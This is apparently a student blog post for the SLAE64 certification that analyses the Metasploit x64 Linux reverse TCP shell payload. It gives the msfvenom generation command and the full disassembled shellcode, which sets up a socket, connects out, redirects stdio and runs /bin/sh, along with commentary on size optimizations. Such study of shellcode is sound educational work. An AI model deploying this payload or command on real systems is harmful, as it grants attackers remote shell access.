For the 5th assignment of the SecurityTube Linux Assembly Expert certification, I needed to analyze some metasploit payloads for Linux x64.
I started by looking at the linux/x64/shell_reverse_tcp.
Instead of using msfpayload, as suggested in the course materials, I’ve used msfvenom, as msfpayload is not installed in my Kali box.
1 |
$> msfvenom -p linux/x64/shell_reverse_tcp -f elf |
The generated payload is 74 bytes which is much smaller than what I was able to achieve in Assignment #2, but in that assignment I also had a password protection.
For some reason it was impossible to use objdump to get the disassembly of the generated ELF, complaining about corrupted ELF section headers. Still, I ran GDB and here’s the disassembled code:
1 2 3 4 5 6 7 8 9 10 |
0x400078 push 0x29 0x40007a pop rax 0x40007b cdq 0x40007c push 0x2 0x40007e pop rdi 0x40007f push 0x1 0x400081 pop rsi 0x400082 syscall 0x400084 xchg rdi,rax |
This first section sets up a socket for the connection through the socket() syscall (0x29 or 41 from unistd_64.h). They have employed the same PUSH/POP vs MOV strategy for shellcode size reduction. Additional differences from my own implementation are the smart use of CDQ to null RDX instead of using XOR like I did. Also the use of XCHG instead of MOV is very smart for lowering the shellcode size.
The next section is the establishment of the actual connection through the connect() system call (0x2a or 42 from unistd_64.h). It was interesting to see them fill the whole sockaddr structure in a single instruction, although this causes the appearance of null bytes in the code.
1 2 3 4 5 6 7 8 |
0x400086 movabs rcx,0xf02000a5c110002 0x400090 push rcx 0x400091 mov rsi,rsp 0x400094 push 0x10 0x400096 pop rdx 0x400097 push 0x2a 0x400099 pop rax 0x40009a syscall |
Although I have not tested, I believe the code could be further optimized at 0x400091 by using a PUSH/POP combo instead of the MOV.
1 2 3 4 5 6 7 8 |
0x40009c push 0x3 0x40009e pop rsi 0x40009f dec rsi 0x4000a2 push 0x21 0x4000a4 pop rax 0x4000a5 syscall 0x4000a7 jne 0x40009f |
This section is exactly like my own implementation, it’s the loop for calling the dup2() system call to redirect STDIN, STDOUT and STDERR to the connection socket.
1 2 3 4 5 6 7 8 9 10 |
0x4000a9 push 0x3b 0x4000ab pop rax 0x4000ac cdq 0x4000ad movabs rbx,0x68732f6e69622f 0x4000b7 push rbx 0x4000b8 mov rdi,rsp 0x4000bb push rdx 0x4000bc push rdi 0x4000bd mov rsi,rsp 0x4000c0 syscall |
Previous comments also apply to the last section where execve() system call is used to run ‘/bin/sh/’. Interesting use of CDQ to null RDX, smart choice of populating RBX in a single MOV instruction although it comes with a null byte and possible size optimizations at 0x4000b8 and 0x4000bd if a PUSH/POP combo is used instead of the MOV.
Overall I feel proud that the published metasploit reverse tcp shell implementation is essentially very similar to mine.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification.
Student ID: SLAE64-1440